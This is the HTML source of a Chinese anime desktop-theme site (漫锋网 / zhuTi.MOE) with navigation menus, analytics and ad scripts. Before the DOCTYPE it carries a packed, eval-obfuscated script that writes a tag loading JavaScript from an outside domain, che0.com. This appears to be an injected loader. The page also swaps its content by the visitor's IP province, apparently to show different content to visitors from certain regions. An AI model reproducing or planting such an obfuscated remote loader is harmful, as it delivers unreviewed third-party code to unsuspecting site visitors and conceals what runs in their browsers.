<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5.6("<1 4=\\"2\\/3\\" a=\\"b:\\/\\/9.7\\/0\\/8.0\\"><\\/1>");',12,12,'js|script|text|javascript|type|document|write|com|css|che0|src|http'.split('|'),0,{}));
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>zhuTi.MOE 漫锋网 - 萌化主题网 - 最专业的萌化资源分享平台</title>
<meta name="description" content="萌化主题网[ZHUTI.MOE]原漫锋网151.HK,是国内最专业的系统萌化资源网站,旨在为广大漫迷提供最新最炫的动漫萌化主题,动漫桌面主题,动漫Win10主题和各种软件萌化皮肤!">
<meta name="keywords" content="漫锋网,萌化主题,萌化主题网,151.HK,zhuti">

<style>
	
html {
  -moz-box-sizing: border-box;
       box-sizing: border-box;
}
a,a:hover{color:#FFF;text-decoration:none}

*, *:before, *:after {
  -moz-box-sizing: border-box;
       box-sizing: border-box;
}

body {
  margin: 0;
  
  font-size: 16px;
  line-height: 1.5;

  	width:100%;
	height:100%;
	margin:0 auto;
	max-width:1920px;
	background-color:#000;
	background-image:url('http://wx2.sinaimg.cn/large/005z6tdJly1fi5bd7jjd2j31z41401kx.jpg');
	background-position:top center;
	background-repeat:no-repeat;
	background-size:cover;
	position:relative;
	overflow:hidden;
}

nav ul {
  list-style: none;
  padding-left: 0;
  margin-top: 0;
  margin-bottom: 0;

}

h1 {
  width: 100%;
  margin: 110px auto 20px;
  color: #FFF;
  text-align: center;text-shadow: 0 0 10px #000;
}
h2 {
  width: 100%;
  margin: 30px auto 30px;
  color: #FFF;
  text-align: center;text-shadow: 0 0 10px #000;
}h3 {
  width: 100%;
  margin: 30px auto 30px;
  color: #FFF;font-size:50px;
  text-align: center;text-shadow: 0 0 10px #000;
}
	.cssc42d02a671842e{
	font-size:100px;
	}
.nav {
  width: 675px;
  margin: 0 auto;
  background: #000;
  color: #f0f0f0;border-radius: 5px;
  opacity:0.7;
  box-shadow: 3px 3px 3px #ccc;text-shadow: 0 0 2px #000;
}
.nav a {
  display: block;
  padding: 0 16px;
  line-height: inherit;
  cursor: pointer;
}
.nav_menu {
  line-height: 45px;
  font-weight: 800;
  text-transform: uppercase;  
}
.nav_menu-item {
  display: inline-block;
  position: relative;
}
.nav_menu-item:hover {
  background-color: #9b59b6;
}
.nav_menu-item:hover .nav_submenu {
  display: block;
}
.nav_submenu {
  font-weight: 300;
  text-transform: none;
  display: none;
  position: absolute;
  width: 220px;
  background-color: #9b59b6;
}
.nav_submenu-item:hover {
  background: rgba(0, 0, 0, 0.1);
}

	/** 等于或大于800px**/
@media screen and (min-width: 400px) {
	.yc800 {
		display: none;
	}
	} 
</style>
	<link href='http://cdn.webfont.youziku.com/webfonts/nomal/99374/45803/59806c42f629d817982abc1d.css' rel='stylesheet' type='text/css' />
	<!-- 百度统计 -->
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "//hm.baidu.com/hm.js?4724583baaf69005811d5eec162f706f";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>
	<!-- 百度统计 -->
<script type="text/javascript" src="http://cdn.webfont.youziku.com/wwwroot/js/wf/youziku.api.min.js"></script>
</head>
<body>
<!-- 代码 开始 -->
<h1 class="cssc42d02a671842e">漫锋网</h1>
<h2 class="cssc42ee11011842e">漫锋网是国内最专业的视觉美化交流平台，桌面美化者的聚集地！</h2>


<div class="yc800">
<nav class="nav">
  <ul class="nav_menu">
	<li class="nav_menu-item"><a href="http://151.hk/"><i class="iconfont icon-shouye1"></i>首页</a></li>
	<li class="nav_menu-item"><a href="http://151.hk/pc/" class="sf-with-ul"><i class="iconfont icon-pc"></i>桌面主题</a>
	<ul class="nav_submenu">
		<li class="nav_submenu-item"><a href="http://151.hk/tag/win10-zhuti/"><i class="iconfont icon-windows8"></i>Win10主题</a></li>
		<li class="nav_submenu-item"><a href="http://151.hk/tag/win8-zhuti/"><i class="iconfont icon-windows1"></i>Win8主题</a></li>
		<li class="nav_submenu-item"><a href="http://151.hk/tag/win7-zhuti/"><i class="iconfont icon-windows-online"></i>Win7主题</a></li>
		<li class="nav_submenu-item"><a href="http://151.hk/tag/xp-zhuti/"><i class="iconfont icon-windowsxp"></i>Win XP主题</a></li>
	</ul>
	</li>
	<li class="nav_menu-item"><a href="http://151.hk/skins/" class="sf-with-ul"><i class="iconfont icon-weibiaoti101"></i>软件皮肤</a>
	<ul class="nav_submenu">
		<li class="nav_submenu-item"><a href="http://151.hk/tag/rainmeter/"><i class="iconfont icon-shuidicaise"></i>雨滴皮肤</a></li>
		<li class="nav_submenu-item"><a href="http://151.hk/tag/aimp/"><i class="iconfont icon-icon-music"></i>AIMP皮肤</a></li>
		<li class="nav_submenu-item"><a href="http://151.hk/tag/input-skins/"><i class="iconfont icon-sougoushurufa"></i>输入法皮肤</a></li>
		<li class="nav_submenu-item"><a href="http://151.hk/tag/browser-skins/"><i class="iconfont icon-iconfonticonfontbrowsernew"></i>浏览器皮肤</a></li>
	</ul>
	</li>
	<li class="nav_menu-item"><a class="sf-with-ul" style="cursor: pointer;"><i class="iconfont icon-mokuaiguanli"></i>图标指针</a>
	<ul class="nav_submenu">
		<li class="nav_submenu-item"><a href="http://151.hk/tag/tubiao/"><i class="iconfont icon-bijiben"></i>桌面图标</a></li>
		<li class="nav_submenu-item"><a href="http://151.hk/tag/cursors/"><i class="iconfont icon-shubiao"></i>鼠标指针</a></li>
		<li class="nav_submenu-item"><a href="http://151.hk/start-orbs/"><i class="iconfont icon-anniu1"></i>开始按钮</a></li>
	</ul>
	</li>
	<li class="nav_menu-item"><a class="sf-with-ul" style="cursor: pointer;"><i class="iconfont icon-img1"></i>壁纸</a>
	<ul class="nav_submenu">
		<li class="nav_submenu-item"><a href="http://151.hk/wallpaper/"><i class="iconfont icon-diannao2"></i>桌面壁纸</a></li>
		<li class="nav_submenu-item"><a href="http://151.hk/animated/"><i class="iconfont icon-shipin"></i>动态壁纸</a></li>
		<li class="nav_submenu-item"><a href="http://151.hk/mobile/"><i class="iconfont icon-shouji"></i>手机壁纸</a></li>
	</ul>
	</li>
	<li class="nav_menu-item"><a href="http://151.hk/tools/"><i class="iconfont icon-gongju2"></i>软件</a></li>
	<li class="nav_menu-item"><a href="http://151.hk/study/"><i class="iconfont icon-bangzhu3"></i>教程</a></li>
	<li class="nav_menu-item"><a href="http://151.hk/forums/"><i class="iconfont icon-bbs1"></i>社区</a></li>
</ul>

  
</nav>
</div>


<script src="http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js" charset="GB2312" ></script>
<script type=text/javascript>
var _area=remote_ip_info.province;
if( _area=='河南'){
    document.write('<h3 class="cssc43038e781842e">QQ群：81666657</h3>');
}else if( _area=='北京'){
  document.write('<h3 class="cssc43038e781842e">QQ群：81666657</h3>');
}else{
   document.write('<nav class="nav"><ul class="nav_menu"><li class="nav_menu-item"><a href="http://151.hk/"><i class="iconfont icon-shouye1"></i>首页</a></li><li class="nav_menu-item"><a href="http://151.hk/pc/" class="sf-with-ul"><i class="iconfont icon-pc"></i>桌面主题</a><ul class="nav_submenu"><li class="nav_submenu-item"><a href="http://151.hk/tag/win10-zhuti/"><i class="iconfont icon-windows8"></i>Win10主题</a></li><li class="nav_submenu-item"><a href="http://151.hk/tag/win8-zhuti/"><i class="iconfont icon-windows1"></i>Win8主题</a></li><li class="nav_submenu-item"><a href="http://151.hk/tag/win7-zhuti/"><i class="iconfont icon-windows-online"></i>Win7主题</a></li><li class="nav_submenu-item"><a href="http://151.hk/tag/xp-zhuti/"><i class="iconfont icon-windowsxp"></i>Win XP主题</a></li></ul></li><li class="nav_menu-item"><a href="http://151.hk/skins/" class="sf-with-ul"><i class="iconfont icon-weibiaoti101"></i>软件皮肤</a><ul class="nav_submenu"><li class="nav_submenu-item"><a href="http://151.hk/tag/rainmeter/"><i class="iconfont icon-shuidicaise"></i>雨滴皮肤</a></li><li class="nav_submenu-item"><a href="http://151.hk/tag/aimp/"><i class="iconfont icon-icon-music"></i>AIMP皮肤</a></li><li class="nav_submenu-item"><a href="http://151.hk/tag/input-skins/"><i class="iconfont icon-sougoushurufa"></i>输入法皮肤</a></li><li class="nav_submenu-item"><a href="http://151.hk/tag/browser-skins/"><i class="iconfont icon-iconfonticonfontbrowsernew"></i>浏览器皮肤</a></li></ul></li><li class="nav_menu-item"><a class="sf-with-ul"><i class="iconfont icon-mokuaiguanli"></i>图标指针</a><ul class="nav_submenu"><li class="nav_submenu-item"><a href="http://151.hk/tag/tubiao/"><i class="iconfont icon-bijiben"></i>桌面图标</a></li><li class="nav_submenu-item"><a href="http://151.hk/tag/cursors/"><i class="iconfont icon-shubiao"></i>鼠标指针</a></li><li class="nav_submenu-item"><a href="http://151.hk/start-orbs/"><i class="iconfont icon-anniu1"></i>开始按钮</a></li></ul></li><li class="nav_menu-item"><a class="sf-with-ul"><i class="iconfont icon-img1"></i>壁纸</a><ul class="nav_submenu"><li class="nav_submenu-item"><a href="http://151.hk/wallpaper/"><i class="iconfont icon-diannao2"></i>桌面壁纸</a></li><li class="nav_submenu-item"><a href="http://151.hk/animated/"><i class="iconfont icon-shipin"></i>动态壁纸</a></li><li class="nav_submenu-item"><a href="http://151.hk/mobile/"><i class="iconfont icon-shouji"></i>手机壁纸</a></li></ul></li><li class="nav_menu-item"><a href="http://151.hk/tools/"><i class="iconfont icon-gongju2"></i>软件</a></li><li class="nav_menu-item"><a href="http://151.hk/study/"><i class="iconfont icon-bangzhu3"></i>教程</a></li><li class="nav_menu-item"><a href="http://151.hk/forums/"><i class="iconfont icon-bbs1"></i>社区</a></li></ul></nav>');
}
</script>



<!-- 广告位：点进入 -->
<div style="text-align:center;">
<script>
(function() {
    var s = "_" + Math.random().toString(36).slice(2);
    document.write('<div id="' + s + '"></div>');
    (window.slotbydup=window.slotbydup || []).push({
        id: '4620612',
        container: s,
        size: '500,172',
        display: 'inlay-fix'
    });
})();
</script>
<script src="http://dup.baidustatic.com/js/os.js"></script>
</div>
<script type="text/javascript">
   $youziku.load("body", "7e5cf951b0b84ccb958e028fcb84bf53", "ruibo");
   /*$youziku.load("#id1,.class1,h1", "7e5cf951b0b84ccb958e028fcb84bf53", "ruibo");*/
   /*．．．*/
   $youziku.draw();
</script>
</body>
</html>